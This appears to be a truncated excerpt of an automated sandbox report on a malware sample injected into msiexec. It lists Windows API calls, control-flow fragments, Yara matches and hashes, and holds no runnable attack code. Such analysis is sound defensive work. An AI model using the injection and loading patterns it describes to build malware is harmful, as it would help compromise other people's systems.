                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                      • Instruction ID: 9775cb961544216980d021f11180c78e3c425faed164cd7f673ad31af02f7bb9
                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                      • Instruction Fuzzy Hash: 09F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97245D630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 302 6da47b-6da4a9 call 6daf50 NtClose
                      APIs
                      • NtClose.NTDLL(@Mm,?,?,006D4D40,00000000,FFFFFFFF), ref: 006DA4A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID: @Mm
                      • API String ID: 3535843008-4178540671
                      • Opcode ID: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                      • Instruction ID: a24dd39c748159f0d9778a6b94d63d0b9e09d1f2276143c4559542e4f6830571
                      • Opcode Fuzzy Hash: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                      • Instruction Fuzzy Hash: D0E08C75600200ABD720DFE9CC86EEB7B68EF84364F108199BA1DEB242C630A50086A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 6da480-6da496 309 6da49c-6da4a9 NtClose 308->309 310 6da497 call 6daf50 308->310 310->309
                      APIs
                      • NtClose.NTDLL(@Mm,?,?,006D4D40,00000000,FFFFFFFF), ref: 006DA4A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID: @Mm
                      • API String ID: 3535843008-4178540671
                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                      • Instruction ID: dcbdcd1dcca5e63616a7ffc4cda959d4bdbcdf9d9ae85e3075a0c99f86960bdf
                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                      • Instruction Fuzzy Hash: 31D01776600214ABD710EBD8CC85EA77BADEF48760F158499BA1C9B242C530FA0086E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 45b89a27e8dbf47994eb576501a14debf3329f5a0f18e96380c2502e9f353eae
                      • Instruction ID: 701755cc18b633769cb2b9b73cde0f337d341db8eecfab67ed3f69b1f1914544
                      • Opcode Fuzzy Hash: 45b89a27e8dbf47994eb576501a14debf3329f5a0f18e96380c2502e9f353eae
                      • Instruction Fuzzy Hash: 149002A5211000032105A9590B05507004A97D5395352C021F2416550CF661E8617161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 49b62616f4a15b9a304cfa465f72238da85f459e4cc9e3b0b5732999674a455a
                      • Instruction ID: 608e69b45a5b9e783f4a6952341a778410682b7f111c7d5e8a20437f7a077aac
                      • Opcode Fuzzy Hash: 49b62616f4a15b9a304cfa465f72238da85f459e4cc9e3b0b5732999674a455a
                      • Instruction Fuzzy Hash: AF9002E120200003610575594815616400E97E0245B52C021E2415590DE565E8917165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 438b373f1de9633bf2b50c9967af71df5d9aa0b0e4369857648b61f24f617e66
                      • Instruction ID: 139d930b6df246e822feaa3a3c5fdd4790f25ab13989cc3a280b31808ca00049
                      • Opcode Fuzzy Hash: 438b373f1de9633bf2b50c9967af71df5d9aa0b0e4369857648b61f24f617e66
                      • Instruction Fuzzy Hash: 6B9002B120108802F1106559880574A000997D0345F56C411A5825658DA6D5E8917161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 29f56d36c92927b9e5338b43fcd401ce435bc34e00942ffbe70249ad995d688a
                      • Instruction ID: 3b8d35fa37cdf782f5e04e86a7002c25ca7d43f4fb963eb832bf14ff51c42afb
                      • Opcode Fuzzy Hash: 29f56d36c92927b9e5338b43fcd401ce435bc34e00942ffbe70249ad995d688a
                      • Instruction Fuzzy Hash: CA9002B120100842F10065594805B46000997E0345F52C016A1525654DA655E8517561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 81b29ae22e5e9b56f2c53cc3c6182089fe6ce32b628a3e3114f7215b0a6fb852
                      • Instruction ID: 5adac3b7305a5b04e1582856d42fd70b00e397e623b0347c8756bfecee017673
                      • Opcode Fuzzy Hash: 81b29ae22e5e9b56f2c53cc3c6182089fe6ce32b628a3e3114f7215b0a6fb852
                      • Instruction Fuzzy Hash: 889002B120100402F10069995809646000997E0345F52D011A6425555EE6A5E8917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9ee2b7b172c0d4f054d0eca7c706441e3e02b1e8dd5990943373a44981c6433c
                      • Instruction ID: 5a01b454ac8b314ca139f0ce5cfa264a3c96c14956bd40d3f1819c50916afefb
                      • Opcode Fuzzy Hash: 9ee2b7b172c0d4f054d0eca7c706441e3e02b1e8dd5990943373a44981c6433c
                      • Instruction Fuzzy Hash: 2A9002B131114402F11065598805706000997D1245F52C411A1C25558DA6D5E8917162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 793718b3fddbe17b01d569d92d156eacf7a53241c34af9d56159918275fce1d9
                      • Instruction ID: 744b53547fcc079427f8ee883b8be39d7cb3fe9293af88a1668cb4377b8583c4
                      • Opcode Fuzzy Hash: 793718b3fddbe17b01d569d92d156eacf7a53241c34af9d56159918275fce1d9
                      • Instruction Fuzzy Hash: 909002A921300002F1807559580960A000997D1246F92D415A1416558CE955E8697361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 67f7802a8b29f5264a923aeba738f698e742c20e1780f6d91165a91e145ad04c
                      • Instruction ID: 2c0374a04326515e49cc66e2c41d20fde540834c7acdf5cddb1ab99afa9ff14d
                      • Opcode Fuzzy Hash: 67f7802a8b29f5264a923aeba738f698e742c20e1780f6d91165a91e145ad04c
                      • Instruction Fuzzy Hash: 9A9002B120100413F11165594905707000D97D0285F92C412A1825558DB696E952B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 12a1669d04d2a234116f5211121a840ed010f8395ad9719dd19fd194b5e7bc3e
                      • Instruction ID: cf9914d62a11b9e4c4a2dcdaac100a9f31bbc05614a12149961a78b408e35ef0
                      • Opcode Fuzzy Hash: 12a1669d04d2a234116f5211121a840ed010f8395ad9719dd19fd194b5e7bc3e
                      • Instruction Fuzzy Hash: 079002A1242041527545B5594805507400AA7E0285792C012A2815950CA566F856F661
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 562e5ddb1db5c1b64270c70c78957b3c7f04562e88735c8beb7ac608959ee791
                      • Instruction ID: 3782334071c72488d5648e52f8a253fe4faec7600ffa16451d1fdb3a2502d191
                      • Opcode Fuzzy Hash: 562e5ddb1db5c1b64270c70c78957b3c7f04562e88735c8beb7ac608959ee791
                      • Instruction Fuzzy Hash: 4C9002F120100402F14075594805746000997D0345F52C011A6465554EA699EDD576A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fc9cc350c8660e9831d6c15338765859b6fbc34e7bcd8c077e56d9e2aa6466d1
                      • Instruction ID: 8f3d1576040acb50cbad71cc4e86335de1bba7552386759ae3538e4a63fc12fb
                      • Opcode Fuzzy Hash: fc9cc350c8660e9831d6c15338765859b6fbc34e7bcd8c077e56d9e2aa6466d1
                      • Instruction Fuzzy Hash: F49002E134100442F10065594815B060009D7E1345F52C015E2465554DA659EC527166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2f6e7f23b7cbab256eff379144fe0db8b10b27f7f817133b5814456d0abca08d
                      • Instruction ID: dedb3c9ff9ce033d42f4832cd33285753a39c2dadb03fc25bafeb0d8a19c0776
                      • Opcode Fuzzy Hash: 2f6e7f23b7cbab256eff379144fe0db8b10b27f7f817133b5814456d0abca08d
                      • Instruction Fuzzy Hash: 709002A121180042F20069694C15B07000997D0347F52C115A1555554CE955E8617561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 243 6d9070-6d909f 244 6d90ab-6d90b2 243->244 245 6d90a6 call 6dbd30 243->245 246 6d918c-6d9192 244->246 247 6d90b8-6d9108 call 6dbe00 call 6cace0 call 6d4e40 244->247 245->244 254 6d9110-6d9121 Sleep 247->254 255 6d9186-6d918a 254->255 256 6d9123-6d9129 254->256 255->246 255->254 257 6d912b-6d9151 call 6d8c90 256->257 258 6d9153-6d9173 256->258 260 6d9179-6d917c 257->260 258->260 261 6d9174 call 6d8ea0 258->261 260->255 261->260
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 006D9118
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: : $net.dll$wininet.dll
                      • API String ID: 3472027048-1278029986
                      • Opcode ID: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
                      • Instruction ID: deae5710dccfb2f2a44323806fcbd1c436ecf31bf6c4dc20575cbcdaba27bcff
                      • Opcode Fuzzy Hash: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
                      • Instruction Fuzzy Hash: A23170B6900645BBC724DF64CC89FA7B7B9BB48B01F10851EF62A5B345DA30A550CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 263 6d9066-6d9069 264 6d907f-6d90b2 call 6dbd30 263->264 265 6d906b 263->265 270 6d918c-6d9192 264->270 271 6d90b8-6d9108 call 6dbe00 call 6cace0 call 6d4e40 264->271 266 6d906d-6d907b 265->266 267 6d9061-6d9065 265->267 266->264 278 6d9110-6d9121 Sleep 271->278 279 6d9186-6d918a 278->279 280 6d9123-6d9129 278->280 279->270 279->278 281 6d912b-6d9151 call 6d8c90 280->281 282 6d9153-6d9173 280->282 284 6d9179-6d917c 281->284 282->284 285 6d9174 call 6d8ea0 282->285 284->279 285->284
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 006D9118
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: : $net.dll$wininet.dll
                      • API String ID: 3472027048-1278029986
                      • Opcode ID: 8b3994d0265157d9a7cb0f374f2cb7ede4acdbdaa21268cfcc1f567c57777dac
                      • Instruction ID: e5bf98fcdd55708c860dcd25184fa04ac0305336f16aaca396ac1583f8367e01
                      • Opcode Fuzzy Hash: 8b3994d0265157d9a7cb0f374f2cb7ede4acdbdaa21268cfcc1f567c57777dac
                      • Instruction Fuzzy Hash: 2731D171A40245BBC754DF64CC85BA7B7B5AB48701F10805FEA2DAB346D670A560CBE4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 299 6da652-6da676 300 6da67c-6da691 RtlFreeHeap 299->300 301 6da677 call 6daf50 299->301 301->300
                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006C3AF8), ref: 006DA68D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                      • Instruction ID: fe7f2e445b85b4b8500b4210abe1e473996bb3785ba9e021c2bb30ff8a1c5ad6
                      • Opcode Fuzzy Hash: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                      • Instruction Fuzzy Hash: F3E06DB12142046FD714DF98DC44EAB3768AF48310F008589F90C5B342C630ED14CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 305 6da660-6da691 call 6daf50 RtlFreeHeap
                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006C3AF8), ref: 006DA68D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction ID: a6d944c3ba384656978eb32fe818dd6edba4cf0e35c67e629ac04e0503a5dee5
                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction Fuzzy Hash: A5E012B1200208ABDB18EF99CC49EA777ADEF88750F018599BA1C5B242C630E9108AB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 311 6c8309-6c830b 312 6c830d-6c8336 call 6dbe50 call 6dc9f0 311->312 313 6c8339-6c835a call 6cace0 call 6d4e40 311->313 312->313 322 6c835c-6c836e PostThreadMessageW 313->322 323 6c838e-6c8392 313->323 324 6c838d 322->324 325 6c8370-6c838b call 6ca470 PostThreadMessageW 322->325 324->323 325->324
                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006C836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006C838B
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                      • Instruction ID: fc694f0e5449d53410c17aaee59c368a52e5f1ae1b7bc38ff1c1888fd26cf505
                      • Opcode Fuzzy Hash: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                      • Instruction Fuzzy Hash: 4E01B971E402587BE721A6948C43FFE775DAB00B51F04411DFF04FB1C1DAA4690546E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 328 6c8310-6c831f 329 6c8328-6c835a call 6dc9f0 call 6cace0 call 6d4e40 328->329 330 6c8323 call 6dbe50 328->330 338 6c835c-6c836e PostThreadMessageW 329->338 339 6c838e-6c8392 329->339 330->329 340 6c838d 338->340 341 6c8370-6c838b call 6ca470 PostThreadMessageW 338->341 340->339 341->340
                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006C836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006C838B
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                      • Instruction ID: 61ee2b01056d2a8eef33c4ad8fbb9245d772cfe612ff43751771e6b8d676968c
                      • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                      • Instruction Fuzzy Hash: EC018831A402187BE721A6949C03FFE775D9B40F51F05411DFF04BB2C1D694690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006CAD52
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: 41df8d017d7b62095b3fe8ae3fffda565ea599fa9f5c0eb8e15c97c9d5d00771
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: 7C011EB5D4020DABDF10EAE4DD46FEDB3B99F54308F108199E90997241F631EB54CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006DA724
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateInternalProcess
                      • String ID:
                      • API String ID: 2186235152-0
                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction ID: e513b54fb02712236d9144f6d98de197be71b00804d4402b60c8fa9a8dc072fa
                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction Fuzzy Hash: CE01B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97245C630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,006CF040,?,?,00000000), ref: 006D91DC
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                      • Instruction ID: 0eda90746d9788e532ef4f4c9a37d8cb5b7d49afbab7d07e12f2171c9a94f88c
                      • Opcode Fuzzy Hash: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                      • Instruction Fuzzy Hash: E1E06D377902043AE2306599AC02FA7B39D9B81B60F54002AFA0DEB2C1D996F90142A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,006CF040,?,?,00000000), ref: 006D91DC
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                      • Instruction ID: 5ef352b821885938f50f7fb0d55dbafd1758145e9bd46a0789b53c0c898b56d4
                      • Opcode Fuzzy Hash: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                      • Instruction Fuzzy Hash: E6E0223278434036E3306669AC03F96AB198F80710F25006EF708AF2C2D4D9E905826A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,006CF1C2,006CF1C2,?,00000000,?,?), ref: 006DA7F0
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction ID: acef089bbf959b897547abd43016d6bf3cc5e2eaa687f0635f20c7fa773fda8f
                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction Fuzzy Hash: 6FE01AB16002086BDB10DF89CC85EE737ADEF88650F018155BA0C57241C930E8108BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006CAD52
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction ID: b65e9d12b952ee1c8e13bb669b14b7bbc9c63766acb520899cf62b25fd75bd02
                      • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction Fuzzy Hash: F2E046B5E0010EAAEB00DAE4D841FEDB3B9EB44309F008299A9189B640E630EA048B52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,006C8D14,?), ref: 006CF6EB
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                      • Instruction ID: b92ac89025077ee5c5f1ec7f3578330e0f94cb01bb82f7558e927a9f9ad2b406
